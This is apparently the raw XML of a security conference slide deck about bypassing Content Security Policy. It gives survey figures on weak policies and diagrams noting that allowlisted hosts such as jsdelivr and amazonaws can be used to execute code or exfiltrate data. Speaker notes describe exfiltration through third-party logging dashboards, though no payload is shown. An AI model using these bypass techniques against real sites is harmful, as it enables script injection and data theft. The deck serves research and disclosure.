        <a:ext cx="6900512" cy="1384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0DC72-46C1-4898-AD8D-16575EA3CD55}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4656"/>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4D1DD2-1902-47AC-904F-9723F18DB6AD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4656"/>
          <a:ext cx="6900512" cy="1600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GB" sz="4400" kern="1200" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>~1550 Sites in my DB</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4400" kern="1200" dirty="0">
            <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="4656"/>
        <a:ext cx="6900512" cy="1600290"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{877B9B36-37C2-42AB-B290-2D5CFBAE4F98}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1604947"/>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02B78D-1E64-41C4-81A9-043B057A6F0E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1604947"/>
          <a:ext cx="6893773" cy="2326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GB" sz="4400" kern="1200" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Symptoms: </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="1955800">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-GB" sz="4400" kern="1200" dirty="0" err="1">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>xxxx-src</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="4400" kern="1200" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>: cdn.jsdelivr.com, *.jsdelivr.com</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4400" kern="1200" dirty="0">
            <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1604947"/>
        <a:ext cx="6893773" cy="2326246"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{88F358FB-2408-41AF-A257-5964FED42C08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="393119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9E374-6DBC-4B93-8F23-73523EB7F9DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3931193"/>
          <a:ext cx="6900512" cy="1600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GB" sz="4400" kern="1200" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Can be used to Execute code</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4400" kern="1200" dirty="0">
            <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3931193"/>
        <a:ext cx="6900512" cy="16002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0DC72-46C1-4898-AD8D-16575EA3CD55}">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4D1DD2-1902-47AC-904F-9723F18DB6AD}">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GB" sz="4100" kern="1200" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>~550 Sites in my DB</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4100" kern="1200" dirty="0">
            <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2703"/>
        <a:ext cx="6900512" cy="1843578"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{877B9B36-37C2-42AB-B290-2D5CFBAE4F98}">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02B78D-1E64-41C4-81A9-043B057A6F0E}">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GB" sz="4100" kern="1200" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Symptoms: </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="1822450">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-GB" sz="4100" kern="1200" dirty="0" err="1">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>xxxx-src</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="4100" kern="1200" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>: *.amazonaws.com</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4100" kern="1200" dirty="0">
            <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1846281"/>
        <a:ext cx="6900512" cy="1843578"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{88F358FB-2408-41AF-A257-5964FED42C08}">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9E374-6DBC-4B93-8F23-73523EB7F9DB}">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GB" sz="4100" kern="1200" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Can be used to Exfiltrate data</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4100" kern="1200" dirty="0">
            <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>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74821-324B-47CA-879B-BE009D16DC73}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>24/08/2023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21CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1303543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192.168.0.7:8050/csp-directiv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192.168.0.7:8050/csp-directiv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questioned myself how prevalent is CSP. How many bypasses can I find myself?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2621738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Effort to design one, effort to maintain, things can go wrong and your page studently looks awful (no more CSS), third parties can change their hosts and domains and your page can stop being functional. It requires some preparation time (CSP – RO). Cost money.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17796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lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.0.7:8050/header-names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3395423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lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.0.7:8050/header-names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2785467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lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.0.7:8050/header-names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424436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lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.0.7:8050/csp-directives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">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2">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lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>This is for script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4089054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lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>When we look of sources (not only of script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> directive, but other *-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> as well), we find close to 24K of 104K (close to 23%) accepting unsafe-inline as source and 22K (close to 21%) accepting unsafe-eval. A big number, 7.5K (this is 7%) is also accepting https: handler as allowed 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2">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lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>This is for script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4103892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lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.0.7:8050/csp-directives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">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2">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2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>This is for script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="67372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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~77% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(81K/104K)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1266881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Effort to design one, effort to maintain, things can go wrong and your page studently looks awful (no more CSS), third parties can change their hosts and domains and your page can stop being functional. It requires some preparation time (CSP – RO). Cost money.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2123795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investigation to see if the techniques were already being actively used took me even to the deep web, or, also known as the second page of Google.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>I found some of the techniques mentioned in hacker1 reports, such as case X, Y, and Z, but they are not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>It is worth mentioning that most vulnerabilities to bypass CSP are based in JSONP (JSON with Padding) and AngularJS injection. The techniques I explain here are not using these, but rather a different vector of exfiltration and injection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For exfiltration, I take advantage of the logging functionalities that many of these third parties have, such as CloudWatch in Amazon AWS or the Facebook Dashboard where customised events can be seen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For code execution, instead </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213651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questioned myself how prevalent is CSP. How many bypasses can I find myself?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427125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investigation to see if the techniques were already being actively used took me even to the deep web, or, also known as the second page of Google.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>I found some of the techniques mentioned in hacker1 reports, such as case X, Y, and Z, but they are not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>It is worth mentioning that most vulnerabilities to bypass CSP are based in JSONP (JSON with Padding) and AngularJS injection. The techniques I explain here are not using these, but rather a different vector of exfiltration and injection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For exfiltration, I take advantage of the logging functionalities that many of these third parties have, such as CloudWatch in Amazon AWS or the Facebook Dashboard where customised events can be seen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For code execution, instead </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3634673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time, pray to god</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
